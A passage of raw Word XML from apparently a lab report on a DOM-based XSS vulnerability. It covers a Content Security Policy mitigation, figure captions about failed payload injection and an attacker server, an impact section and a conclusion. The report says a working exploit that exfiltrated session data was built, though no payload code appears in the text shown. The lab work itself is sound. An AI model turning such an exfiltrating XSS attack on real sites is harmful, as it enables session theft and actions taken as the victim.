        <w:t xml:space="preserve"> 'self', no 'unsafe-inline') was also added as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>defence</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-in-depth, so that even if an encoding mistake were reintroduced later, inline event handlers and inline scripts would still be blocked from executing by the browser itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEABA0B" w14:textId="6680D4BB" w:rsidR="002A1F0E" w:rsidRDefault="002A1F0E" w:rsidP="002A1F0E">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="776DEAE3" wp14:editId="4425BF7D">
            <wp:extent cx="5943600" cy="399415"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="9946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7149" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="399415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05340DDC" w14:textId="7CD78850" w:rsidR="002A1F0E" w:rsidRDefault="002A1F0E" w:rsidP="002A1F0E">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A1F0E">
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Fig 8 security policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4446BFDE" w14:textId="7A4619B2" w:rsidR="002A1F0E" w:rsidRDefault="009D2340" w:rsidP="002A1F0E">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E54BF04" wp14:editId="2E15465A">
            <wp:extent cx="5943600" cy="564515"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="150864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42227" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="564515"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7685B3B8" w14:textId="6C93FC97" w:rsidR="009D2340" w:rsidRPr="009D2340" w:rsidRDefault="009D2340" w:rsidP="002A1F0E">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D2340">
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Fig 9 injected payload but nothing happens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34229190" w14:textId="481ED288" w:rsidR="002A1F0E" w:rsidRDefault="009D2340" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="617F7A4E" wp14:editId="28D5B4E8">
            <wp:extent cx="5943600" cy="3271520"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="20634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83417" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3271520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A054489" w14:textId="5266AA2E" w:rsidR="009D2340" w:rsidRDefault="009D2340" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D2340">
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Fig 10. Nothing appears on the attacker server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347CC8F0" w14:textId="77777777" w:rsidR="009D2340" w:rsidRDefault="009D2340" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46D005F8" w14:textId="315F3DB8" w:rsidR="009D2340" w:rsidRDefault="009D2340" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D2340">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Now move on to ZAP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F57F021" w14:textId="425D5CDD" w:rsidR="009D2340" w:rsidRDefault="009D2340" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12C05E6F" wp14:editId="11E8A7D6">
            <wp:extent cx="5943600" cy="2522220"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3654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1609" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2522220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCED789" w14:textId="3FB98972" w:rsidR="009D2340" w:rsidRPr="009D2340" w:rsidRDefault="009D2340" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D2340">
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Fig 11. Trying with the new mitigated website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E714B7" w14:textId="77777777" w:rsidR="009D2340" w:rsidRDefault="009D2340" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70AB8A06" w14:textId="1758FAD4" w:rsidR="009D2340" w:rsidRDefault="009D2340" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>-After the payload is injected, nothing happens this time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27211173" w14:textId="40AA520F" w:rsidR="009D2340" w:rsidRDefault="009D2340" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="611AE5AF" wp14:editId="0B385D7E">
            <wp:extent cx="5943600" cy="5525135"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3028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0220" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="5525135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73473E0D" w14:textId="2D7BD654" w:rsidR="009D2340" w:rsidRPr="004D08E1" w:rsidRDefault="009D2340" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D2340">
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Fig 12. Injected payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> failed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05933D5B" w14:textId="77777777" w:rsidR="009D2340" w:rsidRPr="004D08E1" w:rsidRDefault="009D2340" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76BB352B" w14:textId="5E942C5F" w:rsidR="009D2340" w:rsidRPr="004D08E1" w:rsidRDefault="009D2340" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="156082" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D08E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="156082" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6.Impact and Risk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738C3DED" w14:textId="77777777" w:rsidR="009D2340" w:rsidRPr="004D08E1" w:rsidRDefault="009D2340" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72364E95" w14:textId="14B0648A" w:rsidR="009D2340" w:rsidRPr="004D08E1" w:rsidRDefault="009D2340" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D08E1">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>-Confidentiality: session tokens, personal data, and page content can be exfiltrated to an attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D119BED" w14:textId="311A350B" w:rsidR="009D2340" w:rsidRPr="004D08E1" w:rsidRDefault="009D2340" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D08E1">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="004D08E1" w:rsidRPr="004D08E1">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="004D08E1">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>: the injected script can perform actions as the victim (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D08E1">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>e.g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D08E1">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> submitting forms) since it runs with the victim’s authenticated session.</w:t>
      </w:r>
      <w:r w:rsidRPr="004D08E1">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">-No server-side trace; because the payload never crosses the network to the server, server logs and network-layer </w:t>
      </w:r>
      <w:r w:rsidR="004D08E1" w:rsidRPr="004D08E1">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>defenses</w:t>
      </w:r>
      <w:r w:rsidRPr="004D08E1">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> are </w:t>
      </w:r>
      <w:r w:rsidR="004D08E1" w:rsidRPr="004D08E1">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>blind</w:t>
      </w:r>
      <w:r w:rsidRPr="004D08E1">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the initial injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AA0706" w14:textId="24EAF114" w:rsidR="009D2340" w:rsidRDefault="009D2340" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D08E1">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="004D08E1">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> DOM-based XSS is just the same underlying mistake as other XSS types, it just happening inside the browser instead of on the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0802BBC7" w14:textId="1F90D895" w:rsidR="004D08E1" w:rsidRDefault="004D08E1" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B442189" w14:textId="537CA92B" w:rsidR="004D08E1" w:rsidRPr="004D08E1" w:rsidRDefault="004D08E1" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="156082" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D08E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="156082" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>7.Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC5F216" w14:textId="77777777" w:rsidR="004D08E1" w:rsidRDefault="004D08E1" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73FADB49" w14:textId="06D5CC07" w:rsidR="004D08E1" w:rsidRPr="009D2340" w:rsidRDefault="004D08E1" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">This exercise demonstrated a simplified full lifecycle of a DOM-based XSS vulnerability: identifying the source/sink flow in vulnerable client-side code, constructing a working exploit that exfiltrates sensitive data, detecting the attack using both browser </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>DevTools</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> and an intercepting proxy, and applying a mitigation that removes the vulnerable sink rather than attempting to filter malicious input. This highlights that client-side vulnerabilities </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>require client-side detection methods, and that output encoding at the point of DOM insertion is the most reliable defense against this class of vulnerability</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="004D08E1" w:rsidRPr="009D2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E1BE4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A4D89C0A"/>
    <w:lvl w:ilvl="0" w:tplc="EB4ED5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917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E0"/>
    <w:rsid w:val="002910BD"/>
    <w:rsid w:val="002A1F0E"/>
    <w:rsid w:val="003C4509"/>
    <w:rsid w:val="004D08E1"/>
    <w:rsid w:val="0079772A"/>
    <w:rsid w:val="009D2340"/>
    <w:rsid w:val="009F0AF9"/>
    <w:rsid w:val="00A46D12"/>
    <w:rsid w:val="00B91DB1"/>
    <w:rsid w:val="00BC17F6"/>
    <w:rsid w:val="00E708EA"/>
    <w:rsid w:val="00F326E0"/>
    <w:rsid w:val="00F35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DD79"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E09514AB-77B2-4A66-9158-C75AB53E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DB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32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6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E0"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00F326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6E0"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00F326E0"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00F326E0"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00F326E0"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00F32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6E0"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00F326E0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00B91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Đặng</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Sơn Đặng</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-10-05T07:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-05T09:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>